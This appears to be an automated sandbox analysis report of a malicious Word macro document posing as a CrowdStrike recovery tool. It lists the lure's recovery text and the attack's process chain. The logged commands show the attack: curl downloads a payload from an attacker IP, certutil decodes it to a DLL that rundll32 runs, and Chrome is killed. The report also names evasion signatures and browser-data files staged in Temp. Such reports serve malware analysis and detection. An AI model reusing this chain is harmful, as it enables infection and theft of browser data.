Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Contains functionality to query network adapater information

Source: C:\Windows\System32\rundll32.exe

Code function: GetAdaptersInfo,_Smanip,

16_2_00007FFD92BEE600

Found decision node followed by non-executed suspicious APIs

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Found dropped PE file which has not been started or loaded

Source: C:\Windows\SysWOW64\certutil.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mscorsvc.dll

Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\curl.exe	API coverage: 5.4 %
Source: C:\Users\user\AppData\Local\Temp\curl.exe	API coverage: 9.1 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\rundll32.exe TID: 6552

Thread sleep count: 82 > 30

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C0B230 _Bitmask_includes,operator&=,_Bitmask_includes,_Bitmask_includes,operator&=,_Bitmask_includes,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,operator&=,std::_Fs_file::_Fs_file,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,	16_2_00007FFD92C0B230
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C0B1C0 __std_fs_close_handle,FindFirstFileExW,GetLastError,	16_2_00007FFD92C0B1C0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92BF18C0 FindFirstFileW,new,delete,delete,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,delete,delete,delete,FindNextFileW,FindClose,delete,delete,	16_2_00007FFD92BF18C0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92CCDD10 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,	16_2_00007FFD92CCDD10

Source: C:\Windows\System32\rundll32.exe

Code function: 16_2_00007FFD92C95E80 GetSystemInfo,

16_2_00007FFD92C95E80

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\

Source: document.xml	Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V Settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xml	Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: rundll32.exe, 00000010.00000002.5553191262.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.4258778994.0000027F6C3D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259308541.0000027F6C3D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: document.xml	Binary or memory string: </w:t></w:r><w:hyperlink r:id="rId9" w:tgtFrame="_self" w:history="1"><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="146CAC"/><w:u w:val="single"/></w:rPr><w:t>https://go.microsoft.com/fwlink/?linkid=2280386</w:t></w:r></w:hyperlink><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:</w:t></w:r></w:p><w:p w14:paraId="49DFB7AB" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="5"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Recover from WinPE</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: curl.exe, 0000000D.00000003.2188986234.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2189060757.00000000033F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: document.xml	Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="70D69DE5" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Steps to Recover Hyper-V virtual machines</w:t></w:r></w:p><w:p w14:paraId="74745A04" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="10"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>On an impacted virtual machine, add a DVD Drive under
Source: rundll32.exe, 00000010.00000003.2451014222.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2540593407.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2416797193.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2550439735.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2500142406.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2430247545.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2257877794.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2479616705.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2461554328.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2429834267.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2510194846.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: document.xml	Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="5A9C771D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Using recovery media on Hyper-V virtual machines</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t xml:space="preserve"> The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.</w:t></w:r></w:p><w:p w14:paraId="3F927671" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: rundll32.exe, 00000010.00000003.2238753292.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2238844395.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll00
Source: document.xml	Binary or memory string: s Hyper-V settings.</w:t></w:r></w:p><w:p w14:paraId="4A7B9EB4" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="14"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>Reboot normally.</w:t></w:r></w:p><w:p w14:paraId="0384424D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:lastRenderedPageBreak/><w:t>

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 13_2_008B155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

13_2_008B155B

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 13_2_0087D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,

13_2_0087D33A

Enables debug privileges

Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008B0CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_008B0CB4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008B155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_008B155B
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 13_2_008B16BE SetUnhandledExceptionFilter,	13_2_008B16BE
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C91410 __crtCaptureCurrentContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00007FFD92C91410
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C09FB0 SetUnhandledExceptionFilter,	16_2_00007FFD92C09FB0
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C09D50 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_00007FFD92C09D50
Source: C:\Windows\System32\rundll32.exe	Code function: 16_2_00007FFD92C08970 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_00007FFD92C08970
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_00880CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	33_2_00880CB4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_0088155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	33_2_0088155B
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 33_2_008816BE SetUnhandledExceptionFilter,	33_2_008816BE

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe

Network Connect: 172.104.160.126 5000

Document contains VBA stomped code (only p-code) potentially bypassing AV detection

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, VBA stomping: true
Source: ~WRC0000.tmp.26.dr	OLE indicator, VBA stomping: true

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe

Uses taskkill to terminate processes

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 13_2_008B137A cpuid

13_2_008B137A

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoW,GetACP,GetLocaleInfoW,	16_2_00007FFD92CD7430
Source: C:\Windows\System32\rundll32.exe	Code function: __vcrt_getptd,__vcrt_getptd,GetLcidFromDefault,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	16_2_00007FFD92CD76C0
Source: C:\Windows\System32\rundll32.exe	Code function: __crt_fast_encode_pointer,EnumSystemLocalesW,	16_2_00007FFD92CBDD50
Source: C:\Windows\System32\rundll32.exe	Code function: __vcrt_getptd,EnumSystemLocalesW,	16_2_00007FFD92CD6AA0
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoEx,FormatMessageA,	16_2_00007FFD92C0AAC0
Source: C:\Windows\System32\rundll32.exe	Code function: __vcrt_getptd,EnumSystemLocalesW,	16_2_00007FFD92CD6B70
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoW,	16_2_00007FFD92CBEB80
Source: C:\Windows\System32\rundll32.exe	Code function: __vcrt_getptd,EnumSystemLocalesW,	16_2_00007FFD92CD6C80

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\result.txt VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SGlzdG9yeQ== VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\V2ViIERhdGE= VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\cGxhY2VzLnNxbGl0ZQ== VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC54bHN4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation	Jump to behavior
